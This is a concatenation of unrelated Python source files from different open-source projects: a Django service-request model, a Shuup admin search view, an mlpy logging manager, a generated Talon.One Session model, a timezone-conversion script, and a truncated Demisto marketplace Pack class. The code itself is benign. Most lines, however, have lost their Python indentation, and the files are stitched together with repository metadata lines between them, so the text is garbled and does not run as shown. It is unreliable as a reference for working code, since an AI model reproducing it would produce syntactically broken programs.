resumo = models.CharField(verbose_name=_('Resumo'), max_length=50)
casa_legislativa = models.CharField(verbose_name=_('Casa Legislativa'),
max_length=200)
email_contato = models.EmailField(blank=True,
null=True,
verbose_name=_('Email de contato'))
    # Replace with usuarios.models.Telefone?
telefone_contato = models.CharField(max_length=15,
null=True,
blank=True,
verbose_name=_('Telefone de contato'))
data_criacao = models.DateTimeField(auto_now_add=True,
verbose_name=_('Data de criação'))
descricao = models.TextField(blank=True,
null=True,
verbose_name=_('Descrição'))
osticket = models.CharField(blank=True,
null=True,
max_length=256,
verbose_name=_('Código Ticket'))
class Meta:
verbose_name = _('Solicitação de Novo Serviço')
verbose_name_plural = _('Solicitações de Novos Serviços')
ordering = ['data_criacao']
def __str__(self):
return "%s - %s" % (self.codigo, self.resumo)
| interlegis/atendimento | solicitacoes/models.py | Python | gpl-3.0 | 2,330 | 0 |
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.apps import apps
from django.contrib.auth import get_user_model
from django.core.exceptions import FieldDoesNotExist
from django.db.models import Q
from django.http import JsonResponse
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from shuup.core.models import Contact, Product
def _field_exists(model, field):
try:
model._meta.get_field(field)
return True
except FieldDoesNotExist:
return False
class MultiselectAjaxView(TemplateView):
model = None
search_fields = []
result_limit = 20
def init_search_fields(self, cls):
self.search_fields = []
key = "%sname" % ("translations__" if hasattr(cls, "translations") else "")
self.search_fields.append(key)
if issubclass(cls, Contact):
self.search_fields.append("email")
if issubclass(cls, Product):
self.search_fields.append("sku")
self.search_fields.append("barcode")
user_model = get_user_model()
if issubclass(cls, user_model):
if _field_exists(user_model, "username"):
self.search_fields.append("username")
if _field_exists(user_model, "email"):
self.search_fields.append("email")
if not _field_exists(user_model, "name"):
self.search_fields.remove("name")
def get_data(self, request, *args, **kwargs):
model_name = request.GET.get("model")
if not model_name:
return []
cls = apps.get_model(model_name)
qs = cls.objects.all()
if hasattr(cls.objects, "all_except_deleted"):
qs = cls.objects.all_except_deleted()
self.init_search_fields(cls)
if not self.search_fields:
return [{"id": None, "name": _("Couldn't get selections for %s.") % model_name}]
if request.GET.get("search"):
query = Q()
keyword = request.GET.get("search", "").strip()
for field in self.search_fields:
query |= Q(**{"%s__icontains" % field: keyword})
if issubclass(cls, Contact) or issubclass(cls, get_user_model()):
query &= Q(is_active=True)
qs = qs.filter(query).distinct()
return [{"id": obj.id, "name": force_text(obj)} for obj in qs[:self.result_limit]]
def get(self, request, *args, **kwargs):
return JsonResponse({"results": self.get_data(request, *args, **kwargs)})
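# Rough request/response sketch; the URL prefix is hypothetical and depends on how
# this view is wired into the admin URLs:
#   GET .../multiselect/?model=<app_label>.<ModelName>&search=jane
#   -> {"results": [{"id": 42, "name": "Jane Doe"}, ...]}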
| hrayr-artunyan/shuup | shuup/admin/views/select.py | Python | agpl-3.0 | 2,842 | 0.001407 |
from __future__ import division, print_function, absolute_import
import os
import logging
from datetime import datetime
from ..modules.patterns import Singleton
class SilenceableStreamHandler(logging.StreamHandler):
def __init__(self, *args, **kwargs):
super(SilenceableStreamHandler, self).__init__(*args, **kwargs)
self.silenced = False
def emit(self, record):
if not self.silenced:
super(SilenceableStreamHandler, self).emit(record)
class SilenceableFileHandler(logging.FileHandler):
def __init__(self, *args, **kwargs):
super(SilenceableFileHandler, self).__init__(*args, **kwargs)
self.silenced = False
def emit(self, record):
if not self.silenced:
super(SilenceableFileHandler, self).emit(record)
class LoggingMgr(object):
"""The logging manager :class:`.Singleton` class.
The logger manager can be included as a member to any class to
manager logging of information. Each logger is identified by
the module id (`mid`), with which the logger settings can be
changed.
By default a logger with log level LOG_INFO that is output to the stdout
is created.
Attributes
----------
LOG_TYPE_STREAM=0
Log only to output stream (stdout).
LOG_TYPE_FILE=1
Log only to an output file.
LOG_TYPE_ALL=2
Log to both output stream (stdout) and file.
LOG_DEBUG=10
Detailed information, typically of interest only when diagnosing problems.
LOG_INFO=20
Confirmation that things are working as expected.
LOG_WARNING=30
An indication that something unexpected happened, or indicative
of some problem in the near future. The software is still working as expected.
LOG_ERROR=40
Due to a more serious problem, the software has not been able to perform some
function.
LOG_CRITICAL=50
        A serious error, indicating that the program itself may be unable to continue
running.
See Also
--------
:mod:`logging`
Examples
--------
>>> from mlpy.tools.log import LoggingMgr
>>> logger = LoggingMgr().get_logger('my_id')
>>> logger.info('This is a useful information.')
This gets a new logger. If a logger with the module id `my_id` already exists
that logger will be returned, otherwise a logger with the default settings is
created.
>>> LoggingMgr().add_handler('my_id', htype=LoggingMgr.LOG_TYPE_FILE)
This adds a new handler for the logger with module id `my_id` writing the logs
to a file.
>>> LoggingMgr().remove_handler('my_id', htype=LoggingMgr.LOG_TYPE_STREAM)
This removes the stream handler from the logger with module id `my_id`.
    >>> LoggingMgr().change_level('my_id', LoggingMgr.LOG_DEBUG, LoggingMgr.LOG_TYPE_ALL)
This changes the log level for all attached handlers of the logger identified by
`my_id` to LOG_DEBUG.
"""
__metaclass__ = Singleton
LOG_TYPE_STREAM = 0
LOG_TYPE_FILE = 1
LOG_TYPE_ALL = 2
LOG_DEBUG = logging.DEBUG
LOG_INFO = logging.INFO
LOG_WARNING = logging.WARNING
LOG_ERROR = logging.ERROR
LOG_CRITICAL = logging.CRITICAL
def __init__(self):
self._loggers = {}
self._verbosity = {}
self._filename = None
def get_verbosity(self, mid):
""" Gets the verbosity.
The current setting of the verbosity of the logger identified
by `mid` is returned.
Parameters
----------
mid : str
The module id of the logger to change the verbosity of.
Returns
-------
bool :
Whether to turn the verbosity on or off.
"""
return self._verbosity[mid]
def set_verbosity(self, mid, value):
"""Sets the verbosity.
Turn logging on/off for logger identified by `mid`.
Parameters
----------
mid : str
The module id of the logger to change the verbosity of.
value : bool
Whether to turn the verbosity on or off.
"""
        self._verbosity[mid] = value
        handlers = self._loggers[mid].handlers
        for hdl in handlers:
            # a handler is silenced exactly when verbosity is turned off
            hdl.silenced = not value
def get_logger(self, mid, level=LOG_INFO, htype=LOG_TYPE_STREAM, fmt=None, verbose=True, filename=None):
"""Get the logger instance with the identified `mid`.
If a logger with the `mid` does not exist, a new logger will be created with the given settings.
By default only a stream handler is attached to the logger.
Parameters
----------
mid : str
The module id of the logger.
level : int, optional
The top level logging level. Default is LOG_INFO.
htype : int, optional
The logging type of handler. Default is LOG_TYPE_STREAM.
fmt : str, optional
The format in which the information is presented.
Default is "[%(levelname)-8s ] %(name)s: %(funcName)s: %(message)s"
verbose : bool, optional
The verbosity setting of the logger. Default is True
filename : str, optional
The name of the file the file handler writes the logs to.
Default is a generated filename.
Returns
-------
The logging instance.
"""
if mid not in self._loggers:
logger = logging.getLogger(mid)
logger.setLevel(level)
self._loggers[mid] = logger
self._verbosity[mid] = verbose if verbose is not None else True
self.add_handler(mid, htype, level, fmt, filename)
return self._loggers[mid]
def add_handler(self, mid, htype=LOG_TYPE_STREAM, hlevel=LOG_INFO, fmt=None, filename=None):
"""Add a handler to the logger.
Parameters
----------
mid : str
The module id of the logger
htype : int, optional
The logging type to add to the handler. Default is LOG_TYPE_STREAM.
hlevel : int, optional
The logging level. Default is LOG_INFO.
fmt : str, optional
The format in which the information is presented.
Default is "[%(levelname)-8s ] %(name)s: %(funcName)s: %(message)s"
filename : str, optional
The name of the file the file handler writes the logs to.
Default is a generated filename.
"""
if fmt is None:
fmt = "[%(levelname)-8s ] %(name)s: %(funcName)s: %(message)s"
formatter = logging.Formatter(fmt)
if htype == self.LOG_TYPE_STREAM or htype == self.LOG_TYPE_ALL:
handler = SilenceableStreamHandler()
self._add_handler(mid, hlevel, handler, formatter)
if htype == self.LOG_TYPE_FILE or htype == self.LOG_TYPE_ALL:
if self._filename is None:
if not os.path.exists("logs"):
os.makedirs("logs")
dt = datetime.now().strftime("%Y-%m-%d %H-%M-%S")
self._filename = "logs\logfile " + dt + ".log"
filename = filename if filename is not None else self._filename
handler = SilenceableFileHandler(filename)
self._add_handler(mid, hlevel, handler, formatter)
def remove_handler(self, mid, htype):
"""Remove handlers.
Removes all handlers of the given handler type from the logger.
Parameters
----------
mid : str
The module id of the logger
htype : int
The logging type to remove from the handler.
"""
handlers = self._loggers[mid].handlers
for hdl in handlers:
if htype == self.LOG_TYPE_FILE and isinstance(hdl, logging.FileHandler):
self._loggers[mid].removeHandler(hdl)
elif htype == self.LOG_TYPE_STREAM and isinstance(hdl, logging.StreamHandler):
self._loggers[mid].removeHandler(hdl)
def change_level(self, mid, hlevel, htype=LOG_TYPE_ALL):
"""Set the log level for a handler.
Parameters
----------
mid : str
The module id of the logger
hlevel : int
The logging level.
htype : int, optional
The logging type of handler for which to change the
log level. Default is LOG_TYPE_ALL.
"""
handlers = self._loggers[mid].handlers
if hlevel < self._loggers[mid].level:
self._loggers[mid].level = hlevel
for hdl in handlers:
if htype == self.LOG_TYPE_ALL:
hdl.level = hlevel
elif htype == self.LOG_TYPE_FILE and isinstance(hdl, logging.FileHandler):
hdl.level = hlevel
elif htype == self.LOG_TYPE_STREAM and isinstance(hdl, logging.StreamHandler):
hdl.level = hlevel
def _add_handler(self, mid, hlevel, handler, formatter):
handler.setLevel(hlevel)
handler.setFormatter(formatter)
self._loggers[mid].addHandler(handler)
| evenmarbles/mlpy | mlpy/tools/log.py | Python | mit | 9,057 | 0.001877 |
# coding: utf-8
"""
Talon.One API
The Talon.One API is used to manage applications and campaigns, as well as to integrate with your application. The operations in the _Integration API_ section are used to integrate with our platform, while the other operations are used to manage applications and campaigns. ### Where is the API? The API is available at the same hostname as these docs. For example, if you are reading this page at `https://mycompany.talon.one/docs/api/`, the URL for the [updateCustomerProfile][] operation is `https://mycompany.talon.one/v1/customer_profiles/id` [updateCustomerProfile]: #operation--v1-customer_profiles--integrationId--put # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from talon_one.configuration import Configuration
class Session(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'user_id': 'int',
'token': 'str',
'created': 'datetime'
}
attribute_map = {
'user_id': 'userId',
'token': 'token',
'created': 'created'
}
def __init__(self, user_id=None, token=None, created=None, local_vars_configuration=None): # noqa: E501
"""Session - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._user_id = None
self._token = None
self._created = None
self.discriminator = None
self.user_id = user_id
self.token = token
self.created = created
@property
def user_id(self):
"""Gets the user_id of this Session. # noqa: E501
The ID of the user of this session # noqa: E501
:return: The user_id of this Session. # noqa: E501
:rtype: int
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""Sets the user_id of this Session.
The ID of the user of this session # noqa: E501
:param user_id: The user_id of this Session. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and user_id is None: # noqa: E501
raise ValueError("Invalid value for `user_id`, must not be `None`") # noqa: E501
self._user_id = user_id
@property
def token(self):
"""Gets the token of this Session. # noqa: E501
An opaque session identifier # noqa: E501
:return: The token of this Session. # noqa: E501
:rtype: str
"""
return self._token
@token.setter
def token(self, token):
"""Sets the token of this Session.
An opaque session identifier # noqa: E501
:param token: The token of this Session. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and token is None: # noqa: E501
raise ValueError("Invalid value for `token`, must not be `None`") # noqa: E501
self._token = token
@property
def created(self):
"""Gets the created of this Session. # noqa: E501
Unix timestamp indicating when the session was first created. # noqa: E501
:return: The created of this Session. # noqa: E501
:rtype: datetime
"""
return self._created
@created.setter
def created(self, created):
"""Sets the created of this Session.
Unix timestamp indicating when the session was first created. # noqa: E501
:param created: The created of this Session. # noqa: E501
:type: datetime
"""
if self.local_vars_configuration.client_side_validation and created is None: # noqa: E501
raise ValueError("Invalid value for `created`, must not be `None`") # noqa: E501
self._created = created
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Session):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Session):
return True
return self.to_dict() != other.to_dict()
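    # Illustrative usage (not part of the generated file); the values below are made up:
    #
    #     from datetime import datetime
    #     from talon_one.models.session import Session
    #
    #     session = Session(user_id=42, token="opaque-token", created=datetime.utcnow())
    #     session.to_dict()   # {'user_id': 42, 'token': 'opaque-token', 'created': datetime(...)}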
| talon-one/talon_one.py | talon_one/models/session.py | Python | mit | 5,860 | 0 |
from django.utils import timezone
t = timezone.get_current_timezone()
for s in Sleep.objects.all():
if timezone.is_aware(s.start_time): s.start_time = timezone.make_naive(s.start_time, t)
if timezone.is_aware(s.end_time): s.end_time = timezone.make_naive(s.end_time,t)
s.save()
| sleepers-anonymous/zscore | useful_scripts/timezones.py | Python | mit | 292 | 0.017123 |
import base64
import fnmatch
import glob
import json
import os
import re
import shutil
import stat
import subprocess
import urllib.parse
import warnings
from datetime import datetime, timedelta
from distutils.util import strtobool
from distutils.version import LooseVersion
from typing import Tuple, Any, Union, List, Dict, Optional
from zipfile import ZipFile, ZIP_DEFLATED
import git
import google.auth
import sys
import yaml
from google.cloud import storage
import Tests.Marketplace.marketplace_statistics as mp_statistics
from Tests.Marketplace.marketplace_constants import PackFolders, Metadata, GCPConfig, BucketUploadFlow, PACKS_FOLDER, \
PackTags, PackIgnored, Changelog
from Utils.release_notes_generator import aggregate_release_notes_for_marketplace
from Tests.scripts.utils import logging_wrapper as logging
class Pack(object):
""" Class that manipulates and manages the upload of pack's artifact and metadata to cloud storage.
Args:
pack_name (str): Pack root folder name.
pack_path (str): Full path to pack folder.
Attributes:
PACK_INITIAL_VERSION (str): pack initial version that will be used as default.
CHANGELOG_JSON (str): changelog json full name, may be changed in the future.
README (str): pack's readme file name.
METADATA (str): pack's metadata file name, the one that will be deployed to cloud storage.
USER_METADATA (str); user metadata file name, the one that located in content repo.
EXCLUDE_DIRECTORIES (list): list of directories to excluded before uploading pack zip to storage.
AUTHOR_IMAGE_NAME (str): author image file name.
RELEASE_NOTES (str): release notes folder name.
"""
PACK_INITIAL_VERSION = "1.0.0"
CHANGELOG_JSON = "changelog.json"
README = "README.md"
USER_METADATA = "pack_metadata.json"
METADATA = "metadata.json"
AUTHOR_IMAGE_NAME = "Author_image.png"
EXCLUDE_DIRECTORIES = [PackFolders.TEST_PLAYBOOKS.value]
RELEASE_NOTES = "ReleaseNotes"
def __init__(self, pack_name, pack_path):
self._pack_name = pack_name
self._pack_path = pack_path
self._status = None
self._public_storage_path = ""
self._remove_files_list = [] # tracking temporary files, in order to delete in later step
self._server_min_version = "99.99.99" # initialized min version
self._latest_version = None # pack latest version found in changelog
self._support_type = None # initialized in load_user_metadata function
self._current_version = None # initialized in load_user_metadata function
self._hidden = False # initialized in load_user_metadata function
self._description = None # initialized in load_user_metadata function
self._display_name = None # initialized in load_user_metadata function
self._user_metadata = None # initialized in load_user_metadata function
self.eula_link = None # initialized in load_user_metadata function
self._is_feed = False # a flag that specifies if pack is a feed pack
self._downloads_count = 0 # number of pack downloads
self._bucket_url = None # URL of where the pack was uploaded.
        self._aggregated = False  # whether the pack's rn was aggregated or not.
self._aggregation_str = "" # the aggregation string msg when the pack versions are aggregated
self._create_date = None # initialized in enhance_pack_attributes function
self._update_date = None # initialized in enhance_pack_attributes function
self._uploaded_author_image = False # whether the pack author image was uploaded or not
self._uploaded_integration_images = [] # the list of all integration images that were uploaded for the pack
self._support_details = None # initialized in enhance_pack_attributes function
self._author = None # initialized in enhance_pack_attributes function
self._certification = None # initialized in enhance_pack_attributes function
self._legacy = None # initialized in enhance_pack_attributes function
self._author_image = None # initialized in upload_author_image function
self._displayed_integration_images = None # initialized in upload_integration_images function
self._price = 0 # initialized in enhance_pack_attributes function
self._is_private_pack = False # initialized in enhance_pack_attributes function
self._is_premium = False # initialized in enhance_pack_attributes function
self._vendor_id = None # initialized in enhance_pack_attributes function
self._partner_id = None # initialized in enhance_pack_attributes function
self._partner_name = None # initialized in enhance_pack_attributes function
self._content_commit_hash = None # initialized in enhance_pack_attributes function
self._preview_only = None # initialized in enhance_pack_attributes function
self._tags = None # initialized in enhance_pack_attributes function
self._categories = None # initialized in enhance_pack_attributes function
self._content_items = None # initialized in collect_content_items function
self._search_rank = None # initialized in enhance_pack_attributes function
self._related_integration_images = None # initialized in enhance_pack_attributes function
self._use_cases = None # initialized in enhance_pack_attributes function
self._keywords = None # initialized in enhance_pack_attributes function
self._dependencies = None # initialized in enhance_pack_attributes function
self._pack_statistics_handler = None # initialized in enhance_pack_attributes function
self._contains_transformer = False # initialized in collect_content_items function
self._contains_filter = False # initialized in collect_content_items function
self._is_missing_dependencies = False # a flag that specifies if pack is missing dependencies
@property
def name(self):
""" str: pack root folder name.
"""
return self._pack_name
@property
def path(self):
""" str: pack folder full path.
"""
return self._pack_path
@property
def latest_version(self):
""" str: pack latest version from sorted keys of changelog.json file.
"""
if not self._latest_version:
self._latest_version = self._get_latest_version()
return self._latest_version
else:
return self._latest_version
@latest_version.setter
def latest_version(self, latest_version):
self._latest_version = latest_version
@property
def status(self):
""" str: current status of the packs.
"""
return self._status
@property
def is_feed(self):
"""
bool: whether the pack is a feed pack
"""
return self._is_feed
@is_feed.setter
def is_feed(self, is_feed):
""" setter of is_feed
"""
self._is_feed = is_feed
@status.setter # type: ignore[attr-defined,no-redef]
def status(self, status_value):
""" setter of pack current status.
"""
self._status = status_value
@property
def public_storage_path(self):
""" str: public gcs path of uploaded pack.
"""
return self._public_storage_path
@public_storage_path.setter
def public_storage_path(self, path_value):
""" setter of public gcs path of uploaded pack.
"""
self._public_storage_path = path_value
@property
def support_type(self):
""" str: support type of the pack.
"""
return self._support_type
@support_type.setter
def support_type(self, support_value):
""" setter of support type of the pack.
"""
self._support_type = support_value
@property
def current_version(self):
""" str: current version of the pack (different from latest_version).
"""
return self._current_version
@current_version.setter
def current_version(self, current_version_value):
""" setter of current version of the pack.
"""
self._current_version = current_version_value
@property
def hidden(self):
""" bool: internal content field for preventing pack from being displayed.
"""
return self._hidden
@hidden.setter
def hidden(self, hidden_value):
""" setter of hidden property of the pack.
"""
self._hidden = hidden_value
@property
def description(self):
""" str: Description of the pack (found in pack_metadata.json).
"""
return self._description
@description.setter
def description(self, description_value):
""" setter of description property of the pack.
"""
self._description = description_value
@property
def display_name(self):
""" str: Display name of the pack (found in pack_metadata.json).
"""
return self._display_name
@property
def user_metadata(self):
""" dict: the pack_metadata.
"""
return self._user_metadata
@display_name.setter # type: ignore[attr-defined,no-redef]
def display_name(self, display_name_value):
""" setter of display name property of the pack.
"""
self._display_name = display_name_value
@property
def server_min_version(self):
""" str: server min version according to collected items.
"""
if not self._server_min_version or self._server_min_version == "99.99.99":
return Metadata.SERVER_DEFAULT_MIN_VERSION
else:
return self._server_min_version
@property
def downloads_count(self):
""" str: packs downloads count.
"""
return self._downloads_count
@downloads_count.setter
def downloads_count(self, download_count_value):
""" setter of downloads count property of the pack.
"""
self._downloads_count = download_count_value
@property
def bucket_url(self):
""" str: pack bucket_url.
"""
return self._bucket_url
@bucket_url.setter
def bucket_url(self, bucket_url):
""" str: pack bucket_url.
"""
self._bucket_url = bucket_url
@property
def aggregated(self):
""" str: pack aggregated release notes or not.
"""
return self._aggregated
@property
def aggregation_str(self):
""" str: pack aggregated release notes or not.
"""
return self._aggregation_str
@property
def create_date(self):
""" str: pack create date.
"""
return self._create_date
@create_date.setter
def create_date(self, value):
self._create_date = value
@property
def update_date(self):
""" str: pack update date.
"""
return self._update_date
@update_date.setter
def update_date(self, value):
self._update_date = value
@property
def uploaded_author_image(self):
""" bool: whether the pack author image was uploaded or not.
"""
return self._uploaded_author_image
@uploaded_author_image.setter
def uploaded_author_image(self, uploaded_author_image):
""" bool: whether the pack author image was uploaded or not.
"""
self._uploaded_author_image = uploaded_author_image
@property
def uploaded_integration_images(self):
""" str: the list of uploaded integration images
"""
return self._uploaded_integration_images
@property
def is_missing_dependencies(self):
return self._is_missing_dependencies
def _get_latest_version(self):
""" Return latest semantic version of the pack.
In case that changelog.json file was not found, default value of 1.0.0 will be returned.
        Otherwise, the semantic pack versions will be collected from the changelog keys, sorted in descending order,
        and the latest version will be returned.
For additional information regarding changelog.json format go to issue #19786
Returns:
str: Pack latest version.
"""
changelog_path = os.path.join(self._pack_path, Pack.CHANGELOG_JSON)
if not os.path.exists(changelog_path):
return self.PACK_INITIAL_VERSION
with open(changelog_path, "r") as changelog_file:
changelog = json.load(changelog_file)
pack_versions = [LooseVersion(v) for v in changelog.keys()]
pack_versions.sort(reverse=True)
return pack_versions[0].vstring
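    # Illustrative note (not part of the original file): sorting the changelog keys with
    # LooseVersion rather than plain strings is what makes "1.10.0" compare higher than "1.2.0".
    # For example, a hypothetical changelog.json of
    #     {"1.0.0": {...}, "1.2.0": {...}, "1.10.0": {...}}
    # yields "1.10.0" as the latest version, whereas a lexicographic sort would have picked "1.2.0".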
@staticmethod
def organize_integration_images(pack_integration_images: list, pack_dependencies_integration_images_dict: dict,
pack_dependencies_by_download_count: list):
""" By Issue #32038
1. Sort pack integration images by alphabetical order
2. Sort pack dependencies by download count
Pack integration images are shown before pack dependencies integration images
Args:
pack_integration_images (list): list of pack integration images
pack_dependencies_integration_images_dict: a mapping of pack dependency name to its integration images
pack_dependencies_by_download_count: a list of pack dependencies sorted by download count
Returns:
list: list of sorted integration images
"""
def sort_by_name(integration_image: dict):
return integration_image.get('name', '')
# sort packs integration images
pack_integration_images = sorted(pack_integration_images, key=sort_by_name)
# sort pack dependencies integration images
all_dep_int_imgs = pack_integration_images
for dep_pack_name in pack_dependencies_by_download_count:
if dep_pack_name in pack_dependencies_integration_images_dict:
logging.info(f'Adding {dep_pack_name} to deps int imgs')
dep_int_imgs = sorted(pack_dependencies_integration_images_dict[dep_pack_name], key=sort_by_name)
for dep_int_img in dep_int_imgs:
if dep_int_img not in all_dep_int_imgs: # avoid duplicates
all_dep_int_imgs.append(dep_int_img)
return all_dep_int_imgs
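    # Illustrative example (not part of the original file), with simplified image dicts: given pack images
    #     [{"name": "Zoom"}, {"name": "Asana"}]
    # and dependency images {"Base": [{"name": "CommonServerPython"}]} with
    # pack_dependencies_by_download_count == ["Base"], the pack's own images come first
    # (sorted alphabetically) and the dependency images are appended afterwards:
    #     [{"name": "Asana"}, {"name": "Zoom"}, {"name": "CommonServerPython"}]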
@staticmethod
def _get_all_pack_images(pack_integration_images, display_dependencies_images, dependencies_data,
pack_dependencies_by_download_count):
""" Returns data of uploaded pack integration images and it's path in gcs. Pack dependencies integration images
are added to that result as well.
Args:
pack_integration_images (list): list of uploaded to gcs integration images and it paths in gcs.
display_dependencies_images (list): list of pack names of additional dependencies images to display.
dependencies_data (dict): all level dependencies data.
pack_dependencies_by_download_count (list): list of pack names that are dependencies of the given pack
sorted by download count.
Returns:
            list: collection of integration display names and their paths in gcs.
"""
dependencies_integration_images_dict: dict = {}
additional_dependencies_data = {k: v for k, v in dependencies_data.items() if k in display_dependencies_images}
for dependency_data in additional_dependencies_data.values():
for dep_int_img in dependency_data.get('integrations', []):
dep_int_img_gcs_path = dep_int_img.get('imagePath', '') # image public url
dep_int_img['name'] = Pack.remove_contrib_suffix_from_name(dep_int_img.get('name', ''))
dep_pack_name = os.path.basename(os.path.dirname(dep_int_img_gcs_path))
if dep_pack_name not in display_dependencies_images:
continue # skip if integration image is not part of displayed images of the given pack
if dep_int_img not in pack_integration_images: # avoid duplicates in list
if dep_pack_name in dependencies_integration_images_dict:
dependencies_integration_images_dict[dep_pack_name].append(dep_int_img)
else:
dependencies_integration_images_dict[dep_pack_name] = [dep_int_img]
return Pack.organize_integration_images(
pack_integration_images, dependencies_integration_images_dict, pack_dependencies_by_download_count
)
def is_feed_pack(self, yaml_content, yaml_type):
"""
Checks if an integration is a feed integration. If so, updates Pack._is_feed
Args:
yaml_content: The yaml content extracted by yaml.safe_load().
yaml_type: The type of object to check. Should be 'Playbook' or 'Integration'.
Returns:
Doesn't return
"""
if yaml_type == 'Integration':
if yaml_content.get('script', {}).get('feed', False) is True:
self._is_feed = True
if yaml_type == 'Playbook':
if yaml_content.get('name').startswith('TIM '):
self._is_feed = True
@staticmethod
def _clean_release_notes(release_notes_lines):
return re.sub(r'<\!--.*?-->', '', release_notes_lines, flags=re.DOTALL)
@staticmethod
def _parse_pack_dependencies(first_level_dependencies, all_level_pack_dependencies_data):
""" Parses user defined dependencies and returns dictionary with relevant data about each dependency pack.
Args:
            first_level_dependencies (dict): first level dependencies that were retrieved
from user pack_metadata.json file.
all_level_pack_dependencies_data (dict): all level pack dependencies data.
Returns:
dict: parsed dictionary with pack dependency data.
"""
parsed_result = {}
dependencies_data = {k: v for (k, v) in all_level_pack_dependencies_data.items()
if k in first_level_dependencies.keys() or k == GCPConfig.BASE_PACK}
for dependency_id, dependency_data in dependencies_data.items():
parsed_result[dependency_id] = {
"mandatory": first_level_dependencies.get(dependency_id, {}).get('mandatory', True),
"minVersion": dependency_data.get(Metadata.CURRENT_VERSION, Pack.PACK_INITIAL_VERSION),
"author": dependency_data.get('author', ''),
"name": dependency_data.get('name') if dependency_data.get('name') else dependency_id,
"certification": dependency_data.get('certification', 'certified')
}
return parsed_result
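    # Illustrative example (not part of the original file): for a hypothetical pack that declares a
    # dependency on "CommonScripts", the parsed result might look like:
    #     {
    #         "CommonScripts": {
    #             "mandatory": True,
    #             "minVersion": "1.2.3",
    #             "author": "Cortex XSOAR",
    #             "name": "Common Scripts",
    #             "certification": "certified"
    #         }
    #     }
    # The keys mirror the fields collected in _parse_pack_dependencies above.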
@staticmethod
def _create_support_section(support_type, support_url=None, support_email=None):
""" Creates support dictionary that is part of metadata.
        In case the support type is xsoar and no support url was provided, the default xsoar support url is used.
Args:
support_type (str): support type of pack.
support_url (str): support full url.
support_email (str): support email address.
Returns:
            dict: support details dictionary.
"""
support_details = {}
if support_url: # set support url from user input
support_details['url'] = support_url
elif support_type == Metadata.XSOAR_SUPPORT: # in case support type is xsoar, set default xsoar support url
support_details['url'] = Metadata.XSOAR_SUPPORT_URL
# add support email if defined
if support_email:
support_details['email'] = support_email
return support_details
@staticmethod
def _get_author(support_type, author=None):
""" Returns pack author. In case support type is xsoar, more additional validation are applied.
Args:
support_type (str): support type of pack.
author (str): author of the pack.
Returns:
str: returns author from the input.
"""
if support_type == Metadata.XSOAR_SUPPORT and not author:
return Metadata.XSOAR_AUTHOR # returned xsoar default author
elif support_type == Metadata.XSOAR_SUPPORT and author != Metadata.XSOAR_AUTHOR:
logging.warning(f"{author} author doest not match {Metadata.XSOAR_AUTHOR} default value")
return author
else:
return author
@staticmethod
def _get_certification(support_type, certification=None):
""" Returns pack certification.
In case support type is xsoar or partner, CERTIFIED is returned.
In case support is not xsoar or partner but pack_metadata has certification field, certification value will be
taken from pack_metadata defined value.
Otherwise empty certification value (empty string) will be returned
Args:
support_type (str): support type of pack.
certification (str): certification value from pack_metadata, if exists.
Returns:
str: certification value
"""
if support_type in [Metadata.XSOAR_SUPPORT, Metadata.PARTNER_SUPPORT]:
return Metadata.CERTIFIED
elif certification:
return certification
else:
return ""
def _get_tags_from_landing_page(self, landing_page_sections: dict) -> set:
"""
Build the pack's tag list according to the user metadata and the landingPage sections file.
Args:
landing_page_sections (dict): landingPage sections and the packs in each one of them.
Returns:
set: Pack's tags.
"""
tags = set()
sections = landing_page_sections.get('sections', []) if landing_page_sections else []
for section in sections:
if self._pack_name in landing_page_sections.get(section, []):
tags.add(section)
return tags
def _parse_pack_metadata(self, build_number, commit_hash):
""" Parses pack metadata according to issue #19786 and #20091. Part of field may change over the time.
Args:
build_number (str): circleCI build number.
commit_hash (str): current commit hash.
Returns:
dict: parsed pack metadata.
"""
pack_metadata = {
Metadata.NAME: self._display_name or self._pack_name,
Metadata.ID: self._pack_name,
Metadata.DESCRIPTION: self._description or self._pack_name,
Metadata.CREATED: self._create_date,
Metadata.UPDATED: self._update_date,
Metadata.LEGACY: self._legacy,
Metadata.SUPPORT: self._support_type,
Metadata.SUPPORT_DETAILS: self._support_details,
Metadata.EULA_LINK: self.eula_link,
Metadata.AUTHOR: self._author,
Metadata.AUTHOR_IMAGE: self._author_image,
Metadata.CERTIFICATION: self._certification,
Metadata.PRICE: self._price,
Metadata.SERVER_MIN_VERSION: self.user_metadata.get(Metadata.SERVER_MIN_VERSION) or self.server_min_version,
Metadata.CURRENT_VERSION: self.user_metadata.get(Metadata.CURRENT_VERSION, ''),
Metadata.VERSION_INFO: build_number,
Metadata.COMMIT: commit_hash,
Metadata.DOWNLOADS: self._downloads_count,
Metadata.TAGS: list(self._tags or []),
Metadata.CATEGORIES: self._categories,
Metadata.CONTENT_ITEMS: self._content_items,
Metadata.SEARCH_RANK: self._search_rank,
Metadata.INTEGRATIONS: self._related_integration_images,
